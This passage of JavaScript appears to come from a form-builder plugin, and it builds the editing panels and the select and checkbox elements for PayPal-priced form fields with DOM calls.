                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer; padding-left:15px';
            	el_choices_add.setAttribute("title", 'add');
          el_choices_add.setAttribute("onClick", "add_choise_price('select',"+i+")");

  var el_choices_important = document.createElement('div');			
  el_choices_important.style.cssText = 'color:red; padding:4px';
  el_choices_important.innerHTML = 'IMPORTANT! Check the "Empty value" checkbox only if you want the option to be considered as empty.';				

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
        br3.setAttribute("id", "br1");
	var br4 = document.createElement('br');
        br4.setAttribute("id", "br2");
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br3);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_td4.appendChild(el_required_label);
	edit_main_td4_1.appendChild(el_required);
	
	edit_main_td9.appendChild(el_quantity_label);
	edit_main_td9_1.appendChild(el_quantity);
	
	
	edit_main_td5.appendChild(el_size_label);
	edit_main_td5_1.appendChild(el_size);
	
	edit_main_td3.appendChild(el_choices_label);
	edit_main_td3.appendChild(el_choices_add);
  edit_main_td3.setAttribute("colspan", "2");
  edit_main_td3.appendChild(el_choices_important);
	
	edit_main_td8.appendChild(el_product_option_label);
	edit_main_td8.appendChild(el_product_option_add_ul);
	edit_main_td8_1.appendChild(el_product_option_add_a);
	
	/*edit_main_td8_1.appendChild(el_product_option1);
	edit_main_td8_1.appendChild(Property1);
	edit_main_td8_1.appendChild(br);
	edit_main_td8_1.appendChild(el_product_option2);
	edit_main_td8_1.appendChild(Property2);
	edit_main_td8_1.appendChild(br5);
	edit_main_td8_1.appendChild(el_product_option3);
	edit_main_td8_1.appendChild(Property3);
	edit_main_td8_1.appendChild(br6);*/
	
		var div_ = document.createElement('div');
			div_.style.cssText = 'border-bottom:1px dotted black; width: 248px;';
		var br = document.createElement('br');
		
		var el_choices_mini_label = document.createElement('b');
			el_choices_mini_label.innerHTML="Product name";
			el_choices_mini_label.style.cssText='padding-right: 20px; padding-left: 20px; font-size:9px';
			
		var el_choices_price_mini_label = document.createElement('b');
			el_choices_price_mini_label.innerHTML="Price";
			el_choices_price_mini_label.style.cssText='padding-right: 15px; padding-left: 15px;  font-size:9px';
	
		var el_choices_remove_mini_label = document.createElement('b');
			el_choices_remove_mini_label.innerHTML="Empty value";
			el_choices_remove_mini_label.style.cssText='padding-right: 2px; padding-left: 2px; font-size:9px';
			
		var el_choices_dis_mini_label = document.createElement('b');
			el_choices_dis_mini_label.innerHTML="Delete";
			el_choices_dis_mini_label.style.cssText='padding-left: 2px; padding-right: 2px; font-size:9px';
			
		div_.appendChild(br);
		div_.appendChild(el_choices_mini_label);
		div_.appendChild(el_choices_price_mini_label);
		div_.appendChild(el_choices_remove_mini_label);
		div_.appendChild(el_choices_dis_mini_label);
		edit_main_td3.appendChild(div_);

	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
		br.setAttribute("id", "br"+j);
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_option"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:1px; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label_price('"+i+"_option"+j+"', this.value)");
			
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+j);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", w_choices_price[j]);
			el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+i+"_option"+j+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_option"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin-left:4px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_option_price("+j+","+i+")");
			
		var el_choices_dis = document.createElement('input');
			el_choices_dis.setAttribute("type", 'checkbox');
			el_choices_dis.setAttribute("title", 'Empty value');
			el_choices_dis.setAttribute("id", "el_option"+j+"_dis");
			el_choices_dis.setAttribute("onClick", "dis_option_price('"+i+"','"+j+"', this.checked)");
			el_choices_dis.style.cssText ="vertical-align: middle; margin-right:24px; margin-left:24px;";
			if(w_choices_disabled[j])
			{
				el_choices_dis.setAttribute("checked", "checked");
			}
			
		edit_main_td3.appendChild(br);
		edit_main_td3.appendChild(el_choices);
		edit_main_td3.appendChild(el_choices_price);
		edit_main_td3.appendChild(el_choices_dis);
		edit_main_td3.appendChild(el_choices_remove);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr4);
	
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_select");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			

      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
		
	var table_little = document.createElement('table');
           	table_little.setAttribute("id", i+"_table_little");
			
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			
   
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	var select_ = document.createElement('select');
		select_.setAttribute("id", i+"_elementform_id_temp");
		select_.setAttribute("name", i+"_elementform_id_temp");
		select_.style.cssText = "width:"+w_size+"px";
		select_.setAttribute("onchange", "set_select(this)");
		
	for(j=0; j<n; j++)
	{      	
		var option = document.createElement('option');
		option.setAttribute("id", i+"_option"+j);
	if(w_choices_disabled[j])
		option.value="";
	else
		option.setAttribute("value", w_choices_price[j]);
		
		option.setAttribute("onselect", "set_select('"+i+"_option"+j+"')");
           	option.innerHTML = w_choices[j];
	if(w_choices_checked[j]==1)
		option.setAttribute("selected", "selected");
		select_.appendChild(option);
	}	
	
		var div_ = document.createElement('div');
			div_.setAttribute("id", i+"_divform_id_temp");

    
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
	td2.appendChild(adding_type);
	
	td2.appendChild(adding_required);
      	td2.appendChild(select_);
       	td2.appendChild(div_);
     	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
	if(w_field_label_pos=="top")
				label_top(i);
		

	if(w_quantity=="yes")
				add_quantity(i);
// form_maker_open_in_popup(11);
change_class(w_class, i);
refresh_attr(i, 'type_text');
// enable_modals();
add_properties(i, w_property, w_property_values, w_property_type);
spider_popup();
}

function remove_property(id, i) {
  property_ = document.getElementById(id + '_property_' + i);
  property_.parentNode.removeChild(property_);
  property_li_ = document.getElementById('property_li_' + i);
  property_li_.parentNode.removeChild(property_li_);
}

function add_properties(id, w_property, w_property_values, w_property_type) {
  n = w_property.length;
  for (i = 0; i < n; i++) {
    select_ = document.createElement('select');
    select_.setAttribute("id", id+"_propertyform_id_temp"+i);
    select_.setAttribute("name", id+"_propertyform_id_temp"+i);
    select_.setAttribute("type", w_property_type[i]);
    select_.style.cssText = "width:auto; margin:2px 0px";
    for (k = 0; k < w_property_values[i].length; k++) {
      var option = document.createElement('option');
      option.setAttribute("id",id+"_"+i+"_option"+k);
      option.setAttribute("value", w_property_values[i][k]);
      option.innerHTML =  w_property_values[i][k];
      select_.appendChild(option);	
    }
    var select_label = document.createElement('label');
    select_label.innerHTML =  w_property[i];
    select_label.style.cssText = "margin-right:5px";
    select_label.setAttribute("class", 'mini_label');
    select_label.setAttribute("id", id+'_property_label_form_id_temp'+i);
    var span_ = document.createElement('span');
    span_.style.cssText = "margin-right:15px";
    span_.setAttribute("id", id+'_property_'+i);
    div_=document.getElementById(id+"_divform_id_temp");
    span_.appendChild(select_label);
    span_.appendChild(select_);
    div_.appendChild(span_);
    var li_ = document.createElement('li');
    li_.setAttribute("id", 'property_li_'+i);
    var li_label = document.createElement('label');
    li_label.innerHTML=w_property[i];
    li_label.setAttribute("id", 'label_property_'+i);
    li_label.style.cssText ="font-weight:bold; font-size: 13px";
    var li_edit = document.createElement('a');	
    // li_edit.setAttribute("rel", "{handler: 'iframe', size: {x: 650, y: 375}}"	);
    // li_edit.setAttribute("href","index.php?option=com_formmaker&task=product_option_fmc&field_id="+id+"&property_id="+i+"&tmpl=component");
    // li_edit.setAttribute("class","modal");
    li_edit.setAttribute("href", url_for_ajax + "?action=product_option_fmc&field_id="+id+"&property_id="+i+"&url_for_ajax=" + url_for_ajax + "&width=600&height=400&TB_iframe=1");
		li_edit.setAttribute("class","thickbox-preview");
    var li_edit_img = document.createElement('img');
    li_edit_img.setAttribute("src", fmc_plugin_url+'/images/edit.png');
    li_edit_img.style.cssText = "margin-left:13px;";
    li_edit_img.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
    li_edit_img.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
    li_edit.appendChild(li_edit_img);
    var li_x = document.createElement('img');
    li_x.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    li_x.setAttribute("onClick", 'remove_property('+id+','+i+')');
    li_x.style.cssText = "margin-left:3px; cursor:pointer";
    ul_=document.getElementById("option_ul");
    li_.appendChild(li_label);
    li_.appendChild(li_edit);
    li_.appendChild(li_x);
    ul_.appendChild(li_);
  }
  // enable_modals();
  spider_popup();
}

function dis_option(id, value) {
  if (value) {
    document.getElementById(id).value = '';
  }
  else {
    document.getElementById(id).value = document.getElementById(id).innerHTML;
  }
}

function dis_option_price(id, i, value) {
  if (value) {
    document.getElementById(id+'_option'+i).value = '';
  }
  else {
    document.getElementById(id+'_option'+i).value = document.getElementById('el_option_price'+i).value;
  }
}

function type_paypal_checkbox(i, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other,w_allow_other_num, w_class, w_attr_name, w_attr_value,  w_property, w_property_type, w_property_values, w_quantity) {

	document.getElementById("element_type").value="type_paypal_checkbox";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_tr10  = document.createElement('tr');
      		edit_main_tr10.setAttribute("valing", "top");
	var edit_main_tr11  = document.createElement('tr');
      		edit_main_tr11.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

		
	var edit_main_td10 = document.createElement('td');
		edit_main_td10.style.cssText = "padding-top:10px";
	var edit_main_td10_1 = document.createElement('td');
		edit_main_td10_1.style.cssText = "padding-top:10px";

		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top;";
      	edit_main_td4.setAttribute("id", "choices");
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td11 = document.createElement('td');
		edit_main_td11.style.cssText = "padding-top:10px";
	var edit_main_td11_1 = document.createElement('td');
		edit_main_td11_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
			
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	var el_label_flow = document.createElement('label');
			        el_label_flow.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_flow.innerHTML = "Relative Position";
	
	var el_flow_vertical = document.createElement('input');
                el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
                el_flow_vertical.setAttribute("type", "radio");
                el_flow_vertical.setAttribute("value", "ver");
                el_flow_vertical.setAttribute("name", "edit_for_flow");
                el_flow_vertical.setAttribute("onchange", "flow_ver("+i+")");
		Vertical = document.createTextNode("Vertical");
		
	var el_flow_horizontal = document.createElement('input');
                el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
                el_flow_horizontal.setAttribute("type", "radio");
                el_flow_horizontal.setAttribute("value", "hor");
                el_flow_horizontal.setAttribute("name", "edit_for_flow");
                el_flow_horizontal.setAttribute("onchange", "flow_hor("+i+")");
		Horizontal = document.createTextNode("Horizontal");
		
	if(w_flow=="hor")
				el_flow_horizontal.setAttribute("checked", "checked");
	else
				el_flow_vertical.setAttribute("checked", "checked");
				
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		
	var el_quantity_label = document.createElement('label');
	    el_quantity_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_quantity_label.innerHTML = "Quantity property";
		
	var el_quantity = document.createElement('input');
        el_quantity.setAttribute("type", "checkbox");
        el_quantity.setAttribute("value", "yes");
        el_quantity.setAttribute("onclick", "add_quantity('"+i+"')");
	
	if(w_quantity=="yes")
		el_quantity.setAttribute("checked", "checked");
	
		
				
	var el_randomize_label = document.createElement('label');
				el_randomize_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
                el_randomize.setAttribute("id", "el_randomize");
                el_randomize.setAttribute("type", "checkbox");
                el_randomize.setAttribute("value", "yes");
                el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
	if(w_randomize=="yes")
			    el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
				el_allow_other_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
                el_allow_other.setAttribute("id", "el_allow_other");
                el_allow_other.setAttribute("type", "checkbox");
                el_allow_other.setAttribute("value", "yes");
                el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','checkbox')");
	if(w_allow_other=="yes")
			    el_allow_other.setAttribute("checked", "checked");


	
	
	var el_product_option_label = document.createElement('label');
	    el_product_option_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;";
		el_product_option_label.innerHTML = "Product properties";
	
	var el_product_option_add_a = document.createElement('a');
		// el_product_option_add_a.setAttribute("rel", "{handler: 'iframe', size: {x: 650, y: 375}}"	);
		// el_product_option_add_a.setAttribute("href","index.php?option=com_formmaker&task=product_option_fmc&field_id="+i+"&tmpl=component");
		// el_product_option_add_a.setAttribute("class","modal");
    el_product_option_add_a.setAttribute("href", url_for_ajax + "?action=product_option_fmc&field_id=" + i + "&url_for_ajax=" + url_for_ajax + "&width=600&height=400&TB_iframe=1");
		el_product_option_add_a.setAttribute("class","thickbox-preview");

	var el_product_option_add_img = document.createElement('img');
		el_product_option_add_img.setAttribute("src", fmc_plugin_url+'/images/add.png');
		
	var el_product_option_add_ul = document.createElement('ul');
		el_product_option_add_ul.setAttribute("id", 'option_ul');
		el_product_option_add_ul.style.cssText="list-style-type: none; padding:0px"
				
				
	el_product_option_add_a.appendChild(el_product_option_add_img);
	

		
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_choices_label = document.createElement('label');
			el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_choices_label.innerHTML = "Options ";
			
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           		el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise_price('checkbox',"+i+")");
	
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);

	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(Vertical);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(Horizontal);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td10.appendChild(el_product_option_label);
	edit_main_td10.appendChild(el_product_option_add_ul);
	edit_main_td10_1.appendChild(el_product_option_add_a);
		
	edit_main_td11.appendChild(el_quantity_label);
	edit_main_td11_1.appendChild(el_quantity);
	

	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(el_choices_add);
	
		var div_ = document.createElement('div');
			div_.style.cssText = 'border-bottom:1px dotted black; width: 187px;';
		var br = document.createElement('br');
		
		var el_choices_mini_label = document.createElement('b');
			el_choices_mini_label.innerHTML="Product name";
			el_choices_mini_label.style.cssText='padding-right: 15px; padding-left: 15px; font-size:9px';
			
		var el_choices_price_mini_label = document.createElement('b');
			el_choices_price_mini_label.innerHTML="Price";
			el_choices_price_mini_label.style.cssText='padding-right: 15px; padding-left: 15px;  font-size:9px';
	
		var el_choices_remove_mini_label = document.createElement('b');
			el_choices_remove_mini_label.innerHTML="Empty value";
			el_choices_remove_mini_label.style.cssText='padding-right: 2px; padding-left: 2px; font-size:9px';
			
		var el_choices_dis_mini_label = document.createElement('b');
